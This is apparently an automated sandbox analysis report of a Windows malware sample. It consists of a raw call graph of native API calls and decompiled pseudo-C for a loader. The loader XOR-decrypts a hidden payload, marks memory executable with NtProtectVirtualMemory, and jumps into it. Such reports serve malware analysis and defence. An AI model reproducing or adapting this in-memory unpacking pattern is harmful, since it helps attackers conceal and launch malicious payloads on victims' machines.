418086 26289->26291 26292 41de27 LdrLoadDll 26290->26292 26291->26242 26293 4180cc 26292->26293 26296 4180d3 26293->26296 26297 4180e8 26293->26297 26344 41de67 LdrLoadDll 26294->26344 26299 41dfd7 2 API calls 26296->26299 26300 418103 26297->26300 26301 4180ed 26297->26301 26298 418235 26302 41dfd7 2 API calls 26298->26302 26303 4180dc 26299->26303 26307 41fb37 2 API calls 26300->26307 26309 418108 26300->26309 26304 41dfd7 2 API calls 26301->26304 26306 418240 26302->26306 26303->26242 26305 4180f6 26304->26305 26305->26242 26306->26242 26307->26309 26317 41811a 26309->26317 26335 41df57 26309->26335 26310 41816e 26311 418185 26310->26311 26343 41dde7 LdrLoadDll 26310->26343 26312 4181a1 26311->26312 26313 41818c 26311->26313 26316 41dfd7 2 API calls 26312->26316 26315 41dfd7 2 API calls 26313->26315 26315->26317 26318 4181aa 26316->26318 26317->26242 26319 4181d6 26318->26319 26338 41f857 26318->26338 26319->26242 26321 4181c1 26322 41fa57 2 API calls 26321->26322 26323 4181ca 26322->26323 26323->26242 26324->26215 26325->26235 26327 41eb17 LdrLoadDll 26326->26327 26328 418949 26327->26328 26329 41de67 LdrLoadDll 26328->26329 26329->26238 26331 41dff3 NtClose 26330->26331 26332 41eb17 LdrLoadDll 26330->26332 26331->26243 26332->26331 26333->26223 26334->26281 26336 41df73 NtReadFile 26335->26336 26337 41eb17 LdrLoadDll 26335->26337 26336->26310 26337->26336 26339 41f864 26338->26339 26340 41f87b 26338->26340 26339->26340 26341 41fb37 2 API calls 26339->26341 26340->26321 26342 41f892 26341->26342 26342->26321 26343->26311 26344->26298 26467 41e087 26345->26467 26347 41fa04 26347->26248 26349 417c78 26348->26349 26350 417c80 26348->26350 26349->26250 26372 417f53 26350->26372 26470 420b17 26350->26470 26352 417cd4 26353 420b17 2 API calls 26352->26353 26357 417cdf 26353->26357 26354 417d2d 26356 420b17 2 API calls 26354->26356 26359 417d41 26356->26359 26357->26354 26475 420bb7 LdrLoadDll RtlAllocateHeap RtlFreeHeap 26357->26475 26358 420b17 2 API calls 26361 417db4 26358->26361 26359->26358 26360 420b17 2 API calls 26362 417dfc 26360->26362 26361->26360 26476 420b77 LdrLoadDll RtlFreeHeap 26362->26476 26364 417f2b 26477 420b77 LdrLoadDll RtlFreeHeap 26364->26477 26366 417f35 26478 420b77 LdrLoadDll RtlFreeHeap 26366->26478 26368 417f3f 26479 420b77 LdrLoadDll RtlFreeHeap 26368->26479 26370 417f49 26480 420b77 LdrLoadDll RtlFreeHeap 26370->26480 26372->26250 26374 418fd8 26373->26374 26375 418677 6 API calls 26374->26375 26380 418fee 26375->26380 26376 418ff7 26376->26254 26377 41902e 26378 41fa57 2 API calls 26377->26378 26379 41903f 26378->26379 26379->26254 26380->26376 26380->26377 26381 41907a 26380->26381 26382 41fa57 2 API calls 26381->26382 26383 41907f 26382->26383 26383->26254 26385 41e91b 26384->26385 26386 41e797 LdrLoadDll 26384->26386 26481 41e797 26385->26481 26386->26385 26388 41e924 26389 41e797 LdrLoadDll 26388->26389 26390 41e92d 26389->26390 26391 41e797 LdrLoadDll 26390->26391 26392 41e936 26391->26392 26393 41e797 LdrLoadDll 26392->26393 26394 41e93f 26393->26394 26395 41e797 LdrLoadDll 26394->26395 26396 41e948 26395->26396 26397 41e797 LdrLoadDll 26396->26397 26398 41e954 26397->26398 26399 41e797 LdrLoadDll 26398->26399 26400 41e95d 26399->26400 26401 41e797 LdrLoadDll 26400->26401 26402 41e966 26401->26402 26403 41e797 LdrLoadDll 26402->26403 26404 41e96f 26403->26404 26405 41e797 LdrLoadDll 26404->26405 26406 41e978 26405->26406 26407 41e797 LdrLoadDll 26406->26407 26408 41e981 26407->26408 26409 41e797 LdrLoadDll 26408->26409 26410 41e98d 26409->26410 26411 41e797 LdrLoadDll 26410->26411 26412 41e996 26411->26412 26413 41e797 LdrLoadDll 26412->26413 26414 41e99f 26413->26414 26415 41e797 LdrLoadDll 26414->26415 26416 41e9a8 26415->26416 26417 41e797 LdrLoadDll 26416->26417 26418 41e9b1 26417->26418 26419 41e797 LdrLoadDll 26418->26419 26420 41e9ba 26419->26420 26421 41e797 LdrLoadDll 26420->26421 26422 41e9c6 26421->26422 26423 41e797 LdrLoadDll 26422->26423 26424 41e9cf 26423->26424 26425 41e797 LdrLoadDll 26424->26425 26426 41e9d8 26425->26426 26427 41e797 LdrLoadDll 26426->26427 26428 41e9e1 26427->26428 26429 41e797 LdrLoadDll 26428->26429 26430 41e9ea 26429->26430 26431 41e797 LdrLoadDll 26430->26431 26432 41e9f3 26431->26432 26433 41e797 LdrLoadDll 26432->26433 26434 41e9ff 26433->26434 26435 41e797 LdrLoadDll 26434->26435 26436 41ea08 26435->26436 26437 41e797 LdrLoadDll 26436->26437 26438 41ea11 26437->26438 26439 41e797 LdrLoadDll 26438->26439 26440 41ea1a 26439->26440 26441 41e797 LdrLoadDll 26440->26441 26442 41ea23 26441->26442 26443 41e797 LdrLoadDll 26442->26443 26444 41ea2c 26443->26444 26445 41e797 LdrLoadDll 26444->26445 26446 41ea38 26445->26446 26447 41e797 LdrLoadDll 26446->26447 26448 41ea41 26447->26448 26449 41e797 LdrLoadDll 26448->26449 26450 41ea4a 26449->26450 26451 41e797 LdrLoadDll 26450->26451 26452 41ea53 26451->26452 26453 41e797 LdrLoadDll 26452->26453 26454 41ea5c 26453->26454 26455 41e797 LdrLoadDll 26454->26455 26456 41ea65 26455->26456 26457 41e797 LdrLoadDll 26456->26457 26458 41ea71 26457->26458 26459 41e797 LdrLoadDll 26458->26459 26460 41ea7a 26459->26460 26461 41e797 LdrLoadDll 26460->26461 26462 41ea83 26461->26462 26462->26258 26464 41eb17 LdrLoadDll 26463->26464 26465 41da23 26464->26465 26465->26189 26466->26255 26468 41e0a3 NtAllocateVirtualMemory 26467->26468 26469 41eb17 LdrLoadDll 26467->26469 26468->26347 26469->26468 26471 420b27 26470->26471 26472 420b2d 26470->26472 26471->26352 26473 41fb37 2 API calls 26472->26473 26474 420b53 26473->26474 26474->26352 26475->26357 26476->26364 26477->26366 26478->26368 26479->26370 26480->26372 26482 41e7b2 26481->26482 26483 418a87 LdrLoadDll 26482->26483 26484 41e7d2 26483->26484 26485 418a87 LdrLoadDll 26484->26485 26486 41e886 26484->26486 26485->26486 26486->26388 26488 408932 26487->26488 26489 408937 26487->26489 26488->26197 26490 41f9d7 2 API calls 26489->26490 26493 40895c 26490->26493 26491 4089bf 26491->26197 26492 41da07 LdrLoadDll 26492->26493 26493->26491 26493->26492 26494 4089c5 26493->26494 26499 41f9d7 2 API calls 26493->26499 26503 41e107 26493->26503 26495 4089eb 26494->26495 26497 41e107 LdrLoadDll 26494->26497 26495->26197 26498 4089dc 26497->26498 26498->26197 26499->26493 26501 41e107 LdrLoadDll 26500->26501 26502 408c05 26501->26502 26502->26158 26504 41eb17 LdrLoadDll 26503->26504 26505 41e123 26504->26505 26505->26493 26507 41f1da 26506->26507 26510 40c317 26507->26510 26511 40c33b 26510->26511 26512 40c377 LdrLoadDll 26511->26512 26513 40b252 26511->26513 26512->26513 26513->26166 26515 40c68a 26514->26515 26517 40c707 26515->26517 26528 41d7d7 LdrLoadDll 26515->26528 26517->26171 26519 41eb17 LdrLoadDll 26518->26519 26520 40f372 26519->26520 26520->26174 26521 41e317 26520->26521 26522 41eb17 LdrLoadDll 26521->26522 26523 41e336 LookupPrivilegeValueW 26522->26523 26523->26176 26526 41ddc3 26525->26526 26527 41eb17 LdrLoadDll 26525->26527 26526->26177 26527->26526 26528->26517 26530 40c80e 26529->26530 26531 40c667 LdrLoadDll 26530->26531 26532 40c871 26531->26532 26532->26096 26534 40f461 26533->26534 26542 40f517 26533->26542 26535 40c667 LdrLoadDll 26534->26535 26536 40f483 26535->26536 26543 41da87 26536->26543 26538 40f4c5 26546 41dac7 26538->26546 26541 41dfd7 2 API calls 26541->26542 26542->26099 26542->26100 26544 41daa3 26543->26544 26545 41eb17 LdrLoadDll 26543->26545 26544->26538 26545->26544 26547 41eb17 LdrLoadDll 26546->26547 26548 40f50b 26547->26548 26548->26541 26550 40c474 26549->26550 26551 40c478 26549->26551 26550->26116 26552 40c4c3 26551->26552 26553 40c491 26551->26553 26603 41d817 LdrLoadDll 26552->26603 26602 41d817 LdrLoadDll 26553->26602 26555 40c4d4 26555->26116 26557 40c4b3 26557->26116 26559 40f607 LdrLoadDll 26558->26559 26560 417fcd 26558->26560 26559->26560 26560->26118 26604 409767 26561->26604 26563 40975d 26563->26120 26564 409555 26564->26563 26565 408927 2 API calls 26564->26565 26566 409633 26564->26566 26576 409593 26565->26576 26566->26563 26567 409713 26566->26567 26568 408927 2 API calls 26566->26568 26567->26563 26651 40f877 6 API calls 26567->26651 26580 409670 26568->26580 26570 409727 26570->26563 26652 40f877 6 API calls 26570->26652 26572 40973d 26572->26563 26653 40f877 6 API calls 26572->26653 26574 409753 26574->26120 26576->26566 26577 409629 26576->26577 26618 409217 26576->26618 26579 408be7 LdrLoadDll 26577->26579 26578 409217 8 API calls 26578->26580 26579->26566 26580->26567 26580->26578 26581 409709 26580->26581 26582 408be7 LdrLoadDll 26581->26582 26582->26567 26584 41eb17 LdrLoadDll 26583->26584 26585 40d2c9 26584->26585 26586 40f607 26585->26586 26587 40f624 26586->26587 26783 41db07 26587->26783 26590 40f66c 26590->26124 26591 41db57 LdrLoadDll 26592 40f695 26591->26592 26592->26124 26594 40d32c 26593->26594 26595 41eb17 LdrLoadDll 26593->26595 26594->26130 26594->26133 26595->26594 26597 41eb17 LdrLoadDll 26596->26597 26598 40d400 26597->26598 26598->26141 26600 41eb17 LdrLoadDll 26599->26600 26601 40d453 26600->26601 26601->26145 26602->26557 26603->26555 26605 40978e 26604->26605 26606 408927 2 API calls 26605->26606 26613 4099e3 26605->26613 26607 4097e1 26606->26607 26608 408be7 LdrLoadDll 26607->26608 26607->26613 26609 409870 26608->26609 26610 408927 2 API calls 26609->26610 26609->26613 26611 409885 26610->26611 26612 408be7 LdrLoadDll 26611->26612 26611->26613 26616 4098e5 26612->26616 26613->26564 26614 408927 2 API calls 26614->26616 26615 409217 8 API calls 26615->26616 26616->26613 26616->26614 26616->26615 26617 408be7 LdrLoadDll 26616->26617 26617->26616 26619 40923c 26618->26619 26654 41d857 26619->26654 26621 409290 26621->26576 26622 409311 26689 40f757 LdrLoadDll NtClose 26622->26689 26624 41da47 LdrLoadDll 26625 4092b4 26624->26625 26625->26622 26626 4092bf 26625->26626 26628 40933d 26626->26628 26657 40d467 26626->26657 26628->26576 26629 40932c 26631 409333 26629->26631 26632 409349 26629->26632 26634 41dfd7 2 API calls 26631->26634 26690 41d8d7 LdrLoadDll 26632->26690 26633 4092d9 26633->26628 26677 409047 26633->26677 26634->26628 26636 409374 26638 40d467 2 API calls 26636->26638 26640 409394 26638->26640 26640->26628 26691 41d907 LdrLoadDll 26640->26691 26642 4093b9 26692 41d997 LdrLoadDll 26642->26692 26644 4093d3 26645 41d967 LdrLoadDll 26644->26645 26646 4093e2 26645->26646 26647 41dfd7 2 API calls 26646->26647 26648 4093ec 26647->26648 26693 408e17 26648->26693 26650 409400 26650->26576 26651->26570 26652->26572 26653->26574 26655 409286 26654->26655 26656 41eb17 LdrLoadDll 26654->26656 26655->26621 26655->26622 26655->26624 26656->26655 26659 40d492 26657->26659 26658 40f607 LdrLoadDll 26660 40d4f1 26658->26660 26659->26658 26661 41db57 LdrLoadDll 26660->26661 26670 40d53a 26660->26670 26662 40d51c 26661->26662 26663 40d523 26662->26663 26666 40d546 26662->26666 26664 41dba7 LdrLoadDll 26663->26664 26665 40d530 26664->26665 26667 41dfd7 2 API calls 26665->26667 26668 40d5b0 26666->26668 26669 40d590 26666->26669 26667->26670 26672 41dba7 LdrLoadDll 26668->26672 26671 41dfd7 2 API calls 26669->26671 26670->26633 26673 40d59d 26671->26673 26674 40d5c2 26672->26674 26673->26633 26675 41dfd7 2 API calls 26674->26675 26676 40d5cc 26675->26676 26676->26633 26678 40905d 26677->26678 26709 41d377 26678->26709 26680 409076 26685 4091e8 26680->26685 26730 408c27 26680->26730 26682 40915c 26683 408e17 7 API calls 26682->26683 26682->26685 26684 40918a 26683->26684 26684->26685 26686 41da47 LdrLoadDll 26684->26686 26685->26576 26687 4091bf 26686->26687 26687->26685 26688 41e047 LdrLoadDll 26687->26688 26688->26685 26689->26629 26690->26636 26691->26642 26692->26644 26694 408e40 26693->26694 26765 408d87 26694->26765 26697 41e047 LdrLoadDll 26698 408e53 26697->26698 26698->26697 26699 408ede 26698->26699 26702 408ed9 26698->26702 26773 40f7d7 26698->26773 26699->26650 26700 41dfd7 2 API calls 26701 408f11 26700->26701 26701->26699 26703 41d857 LdrLoadDll 26701->26703 26702->26700 26704 408f76 26703->26704 26704->26699 26777 41d897 26704->26777 26706 408fda 26706->26699 26707 418677 6 API calls 26706->26707 26708 40902f 26707->26708 26708->26650 26710 41fb37 2 API calls 26709->26710 26711 41d38e 26710->26711 26737 40a967 26711->26737 26713 41d3a9 26714 41d3ca 26713->26714 26715 41d3de 26713->26715 26716 41fa57 2 API calls 26714->26716 26717 41f9d7 2 API calls 26715->26717 26718 41d3d4 26716->26718 26719 41d445 26717->26719 26718->26680 26720 41f9d7 2 API calls 26719->26720 26721 41d45e 26720->26721 26727 41d72e 26721->26727 26743 41fa17 26721->26743 26724 41d71a 26725 41fa57 2 API calls 26724->26725 26726 41d724 26725->26726 26726->26680 26728 41fa57 2 API calls 26727->26728 26729 41d783 26728->26729 26729->26680 26731 408d26 26730->26731 26732 408c3c 26730->26732 26731->26682 26732->26731 26733 418677 6 API calls 26732->26733 26734 408ca9 26733->26734 26735 41fa57 2 API calls 26734->26735 26736 408cd0 26734->26736 26735->26736 26736->26682 26738 40a98c 26737->26738 26739 40c317 LdrLoadDll 26738->26739 26740 40a9bf 26739->26740 26742 40a9e4 26740->26742 26747 40de97 26740->26747 26742->26713 26744 41fa1d 26743->26744 26762 41e0c7 26744->26762 26748 40dec3 26747->26748 26749 41dd27 LdrLoadDll 26748->26749 26750 40dedc 26749->26750 26751 40dee3 26750->26751 26758 41dd67 26750->26758 26751->26742 26755 40df1e 26756 41dfd7 2 API calls 26755->26756 26757 40df41 26756->26757 26757->26742 26759 40df06 26758->26759 26760 41eb17 LdrLoadDll 26758->26760 26759->26751 26761 41e357 LdrLoadDll 26759->26761 26760->26759 26761->26755 26763 41eb17 LdrLoadDll 26762->26763 26764 41d713 26763->26764 26764->26724 26764->26727 26766 408d9f 26765->26766 26767 40c317 LdrLoadDll 26766->26767 26768 408dba 26767->26768 26769 418a87 LdrLoadDll 26768->26769 26770 408dca 26769->26770 26771 408dd3 PostThreadMessageW 26770->26771 26772 408de7 26770->26772 26771->26772 26772->26698 26774 40f7ea 26773->26774 26780 41d9d7 26774->26780 26778 41eb17 LdrLoadDll 26777->26778 26779 41d8b3 26777->26779 26778->26779 26779->26706 26781 41eb17 LdrLoadDll 26780->26781 26782 40f815 26781->26782 26782->26698 26784 41eb17 LdrLoadDll 26783->26784 26785 40f665 26784->26785 26785->26590 26785->26591

                                              Executed Functions

                                              Function 004012A4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186nativeCOMMONCrypto
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 20 4012a4-4012ac 21 4012c8-4012ea 20->21 22 4012ae 20->22 24 4012eb-4014e7 call 4016b0 call 401260 call 401190 call 4016b0 * 2 call 4010a0 call 401730 21->24 23 4012b0-4012c6 22->23 22->24 23->21 39 4014f0-4014ff 24->39 40 401501-401504 39->40 41 401512-401519 39->41 40->41 42 401506-40150a 40->42 41->39 43 40151b 41->43 42->41 45 40150c-401510 42->45 44 40151e-401573 NtProtectVirtualMemory call 4016b0 43->44 50 401579 call 422f47 44->50 51 401579 call 422f39 44->51 45->41 47 401586-40158c 45->47 47->44 49 40157b-401585 50->49 51->49
                                              C-Code - Quality: 49%
                                              			E004012A4(signed char __eax, unsigned int __ebx, void* __ecx, void* __edx) {
				short _v2;
				long _v4;
				intOrPtr _v8;
				short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v33;
				short _v35;
				long _v39;
				short _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v81;
				short _v83;
				long _v87;
				short _v88;
				short _v92;
				signed int _v96;
				char _v104;
				char _v112;
				char _v113;
				char _v114;
				signed int _v116;
				long _v120;
				long _v124;
				short _v126;
				short _v130;
				char _v148;
				char _v160;
				signed char _t86;
				void* _t98;
				void* _t110;
				void* _t126;
				signed int _t130;
				void* _t136;
				void* _t138;
				unsigned int _t141;
				void* _t148;
				unsigned int _t149;
				signed int _t151;

				_t86 = __eax;
				_t121 = __ebx >> 1;
				_t149 = _t121;
				if(_t149 >= 0) {
					L3:
					_t151 = _t86 & 0x00000000;
					 *_t86 =  *_t86 + _t86;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x67], xmm0");
					asm("movq [ebp-0x5f], xmm0");
					asm("movq [ebp-0x6f], xmm0");
					asm("movq [ebp-0x37], xmm0");
					asm("movq [ebp-0x2f], xmm0");
					asm("movdqa [ebp-0x70], xmm0");
				} else {
					if(_t149 > 0) {
						_push(_t121);
						_t121 = _t141;
						_t148 = (_t141 - 0x00000008 & 0xfffffff0) + 4;
						_push(_t138);
						_v8 =  *((intOrPtr*)(_t141 + 4));
						_t138 = _t148;
						_t141 = _t148 - 0xa8;
						goto L3;
					}
				}
				asm("movq [ebp-0x70], mm0");
				asm("movq [ebp-0x3f], xmm0");
				asm("movq [ebp-0x9c], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v80 = 0xdf82a1b5;
				_v76 = 0x961d1ca3;
				asm("movq xmm0, [ebp-0x50]");
				asm("movq [ebp-0x70], xmm0");
				asm("xorps xmm0, xmm0");
				_v104 = 0x28;
				asm("movdqa [ebp-0x40], xmm0");
				asm("movq [ebp-0x30], xmm0");
				_v32 = 0x9866c596;
				asm("movq [ebp-0xc], xmm0");
				_v28 = 0x7b1dba2;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x40], xmm0");
				_v60 = _v60 ^ 0x10222f38;
				_v64 = _v32 ^ 0x10222f38;
				_v16 = 0xf7da08e6;
				_v24 = 0x691d4748;
				_v20 = 0x87e62da;
				asm("movq xmm0, [ebp-0x18]");
				asm("movq [ebp-0x38], xmm0");
				_v56 = _v56 ^ 0x10222f38;
				_v52 = _v52 ^ 0x10222f38;
				_v87 = 0;
				_v39 = 0;
				_v160 = 0;
				_v83 = 0;
				_v81 = 0;
				_v35 = 0;
				_v33 = 0;
				_v88 = 0;
				_v40 = 0;
				_v4 = 0;
				_v48 = _v16 ^ 0x10222f38;
				E004016B0(_t121,  &_v112, 9,  &_v64);
				_v148 = 0;
				_v130 = 0;
				_v126 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x92], xmm0");
				asm("movq [ebp-0x8a], xmm0");
				E00401260( &_v148,  &_v112);
				_t98 = E00401190(_t151,  &_v148);
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v88 = 0;
				E004016B0(_t121,  &_v112, 0xa,  &_v64);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v16 = 0x5a1c48e0;
				_v96 = _v16;
				_v12 = 0xfb7d;
				asm("movdqa [ebp-0x70], xmm0");
				_v92 = _v12;
				asm("movq [ebp-0xa], xmm0");
				_v32 = 0x63682b43;
				_v28 = 0xbf4e8842;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x70], xmm0");
				_v24 = 0x7757d946;
				_v20 = 0xc888339;
				asm("movq xmm0, [ebp-0x18]");
				_v88 = 0;
				_v2 = 0;
				asm("movq [ebp-0x68], xmm0");
				E004016B0(_t121,  &_v112, 0x16,  &_v64);
				E004010A0( &_v160, _t98,  &_v112, 0, 0);
				_v68 = 0;
				_t110 = E00401730();
				_t126 = 0;
				while(1) {
					_t130 =  *(_t126 + _t110) ^ 0x11a7a880;
					_v116 = _t130;
					if(_t130 == 0x3e && _t130 == 0x97 && _v114 == 0xbd && _v113 == 0xba) {
						break;
					}
					_t126 = _t126 + 1;
					if(_t126 < 0x4000) {
						continue;
					} else {
						_t136 = _v68;
					}
					L11:
					_v120 = 0;
					_v124 = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff,  &_v68,  &_v124, 0x40,  &_v120); // executed
					_v64 = _v64 ^ 0x11a7a880;
					_v60 = _v60 ^ 0x11a7a880;
					_v56 = _v56 ^ 0x11a7a880;
					_v52 = _v52 ^ 0x11a7a880;
					_v48 = _v48 ^ 0x11a7a880;
					E004016B0(_t121, _t136, 0x2ca00,  &_v64);
					_t83 = _t136 + 0x21810; // 0x21810, executed
					 *_t83(); // executed
					return 0;
				}
				_t136 = _t126 + _t110;
				_v68 = _t136;
				goto L11;
			}




















































                                              0x004012a4
                                              0x004012aa
                                              0x004012aa
                                              0x004012ac
                                              0x004012c8
                                              0x004012c8
                                              0x004012ca
                                              0x004012ce
                                              0x004012d1
                                              0x004012d6
                                              0x004012db
                                              0x004012e0
                                              0x004012e5
                                              0x004012ea
                                              0x004012ae
                                              0x004012ae
                                              0x004012b0
                                              0x004012b1
                                              0x004012b9
                                              0x004012bc
                                              0x004012c0
                                              0x004012c4
                                              0x004012c6
                                              0x00000000
                                              0x004012c6
                                              0x004012ae
                                              0x004012eb
                                              0x004012ef
                                              0x004012f4
                                              0x004012fc
                                              0x00401301
                                              0x00401308
                                              0x0040130f
                                              0x00401314
                                              0x00401319
                                              0x0040131e
                                              0x00401321
                                              0x00401326
                                              0x0040132b
                                              0x00401335
                                              0x0040133f
                                              0x00401346
                                              0x0040134b
                                              0x00401350
                                              0x00401357
                                              0x0040135e
                                              0x00401368
                                              0x0040136f
                                              0x00401376
                                              0x0040137e
                                              0x00401383
                                              0x0040138a
                                              0x00401399
                                              0x004013a0
                                              0x004013a8
                                              0x004013b2
                                              0x004013b8
                                              0x004013bc
                                              0x004013c2
                                              0x004013c6
                                              0x004013cc
                                              0x004013d2
                                              0x004013d9
                                              0x004013dc
                                              0x004013e3
                                              0x004013ea
                                              0x004013f0
                                              0x004013f8
                                              0x00401402
                                              0x0040140a
                                              0x00401412
                                              0x0040141e
                                              0x00401429
                                              0x00401431
                                              0x00401436
                                              0x0040143b
                                              0x00401442
                                              0x00401447
                                              0x0040144a
                                              0x0040144f
                                              0x00401459
                                              0x0040145c
                                              0x00401466
                                              0x0040146b
                                              0x0040146f
                                              0x00401478
                                              0x0040147f
                                              0x00401486
                                              0x0040148b
                                              0x00401493
                                              0x0040149a
                                              0x004014a1
                                              0x004014a9
                                              0x004014af
                                              0x004014b5
                                              0x004014ba
                                              0x004014cf
                                              0x004014d9
                                              0x004014e0
                                              0x004014e5
                                              0x004014f0
                                              0x004014f3
                                              0x004014f9
                                              0x004014ff
                                              0x00000000
                                              0x00000000
                                              0x00401512
                                              0x00401519
                                              0x00000000
                                              0x0040151b
                                              0x0040151b
                                              0x0040151b
                                              0x0040151e
                                              0x0040152e
                                              0x00401535
                                              0x0040153c
                                              0x0040153e
                                              0x00401545
                                              0x0040154c
                                              0x00401553
                                              0x0040155a
                                              0x0040156b
                                              0x00401573
                                              0x00401579
                                              0x00401585
                                              0x00401585
                                              0x00401586
                                              0x00401589
                                              0x00000000

                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: C+hc
                                              • API String ID: 2706961497-3848425603
                                              • Opcode ID: 6c6a0a142887b784e5fa5ce0febc2e7f11be7be009093d5d6fe39cd23954e054
                                              • Instruction ID: 5f2fc46273f2a988fd33b2da9c61ea0e16046221c740d3513727dfc5c87a36e1
                                              • Opcode Fuzzy Hash: 6c6a0a142887b784e5fa5ce0febc2e7f11be7be009093d5d6fe39cd23954e054
                                              • Instruction Fuzzy Hash: 758146B1C2075CAADF10CFE4CC41AEEBBB4BF99300F60421EE415BB291EB7516858B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004012B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182nativeCOMMONCrypto
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 47%
                                              			_entry_(signed int __eax) {
				intOrPtr _v8;
				short _v14;
				long _v16;
				short _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v45;
				short _v47;
				long _v51;
				short _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v93;
				short _v95;
				long _v99;
				short _v100;
				short _v104;
				signed int _v108;
				char _v116;
				char _v124;
				char _v125;
				char _v126;
				signed int _v128;
				long _v132;
				long _v136;
				short _v138;
				short _v142;
				char _v160;
				char _v172;
				void* __ebx;
				void* _t97;
				void* _t109;
				void* _t122;
				signed int _t124;
				void* _t130;
				void* _t136;
				signed int _t146;

				_t119 = _t136;
				_v8 =  *((intOrPtr*)(_t136 + 4));
				_t146 = __eax & 0x00000000;
				 *__eax =  *__eax + __eax;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x67], xmm0");
				asm("movq [ebp-0x5f], xmm0");
				asm("movq [ebp-0x6f], xmm0");
				asm("movq [ebp-0x37], xmm0");
				asm("movq [ebp-0x2f], xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x70], mm0");
				asm("movq [ebp-0x3f], xmm0");
				asm("movq [ebp-0x9c], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v92 = 0xdf82a1b5;
				_v88 = 0x961d1ca3;
				asm("movq xmm0, [ebp-0x50]");
				asm("movq [ebp-0x70], xmm0");
				asm("xorps xmm0, xmm0");
				_v116 = 0x28;
				asm("movdqa [ebp-0x40], xmm0");
				asm("movq [ebp-0x30], xmm0");
				_v44 = 0x9866c596;
				asm("movq [ebp-0xc], xmm0");
				_v40 = 0x7b1dba2;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x40], xmm0");
				_v72 = _v72 ^ 0x10222f38;
				_v76 = _v44 ^ 0x10222f38;
				_v28 = 0xf7da08e6;
				_v36 = 0x691d4748;
				_v32 = 0x87e62da;
				asm("movq xmm0, [ebp-0x18]");
				asm("movq [ebp-0x38], xmm0");
				_v68 = _v68 ^ 0x10222f38;
				_v64 = _v64 ^ 0x10222f38;
				_v99 = 0;
				_v51 = 0;
				_v172 = 0;
				_v95 = 0;
				_v93 = 0;
				_v47 = 0;
				_v45 = 0;
				_v100 = 0;
				_v52 = 0;
				_v16 = 0;
				_v60 = _v28 ^ 0x10222f38;
				E004016B0(_t119,  &_v124, 9,  &_v76);
				_v160 = 0;
				_v142 = 0;
				_v138 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x92], xmm0");
				asm("movq [ebp-0x8a], xmm0");
				E00401260( &_v160,  &_v124);
				_t97 = E00401190(_t146,  &_v160);
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v100 = 0;
				E004016B0(_t119,  &_v124, 0xa,  &_v76);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v28 = 0x5a1c48e0;
				_v108 = _v28;
				_v24 = 0xfb7d;
				asm("movdqa [ebp-0x70], xmm0");
				_v104 = _v24;
				asm("movq [ebp-0xa], xmm0");
				_v44 = 0x63682b43;
				_v40 = 0xbf4e8842;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x70], xmm0");
				_v36 = 0x7757d946;
				_v32 = 0xc888339;
				asm("movq xmm0, [ebp-0x18]");
				_v100 = 0;
				_v14 = 0;
				asm("movq [ebp-0x68], xmm0");
				E004016B0(_t119,  &_v124, 0x16,  &_v76);
				E004010A0( &_v172, _t97,  &_v124, 0, 0);
				_v80 = 0;
				_t109 = E00401730();
				_t122 = 0;
				while(1) {
					_t124 =  *(_t122 + _t109) ^ 0x11a7a880;
					_v128 = _t124;
					if(_t124 == 0x3e && _t124 == 0x97 && _v126 == 0xbd && _v125 == 0xba) {
						break;
					}
					_t122 = _t122 + 1;
					if(_t122 < 0x4000) {
						continue;
					} else {
						_t130 = _v80;
					}
					L9:
					_v132 = 0;
					_v136 = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff,  &_v80,  &_v136, 0x40,  &_v132); // executed
					_v76 = _v76 ^ 0x11a7a880;
					_v72 = _v72 ^ 0x11a7a880;
					_v68 = _v68 ^ 0x11a7a880;
					_v64 = _v64 ^ 0x11a7a880;
					_v60 = _v60 ^ 0x11a7a880;
					E004016B0(_t119, _t130, 0x2ca00,  &_v76);
					_t82 = _t130 + 0x21810; // 0x21810, executed
					 *_t82(); // executed
					return 0;
				}
				_t130 = _t122 + _t109;
				_v80 = _t130;
				goto L9;
			}

















































                                              0x004012b1
                                              0x004012c0
                                              0x004012c8
                                              0x004012ca
                                              0x004012ce
                                              0x004012d1
                                              0x004012d6
                                              0x004012db
                                              0x004012e0
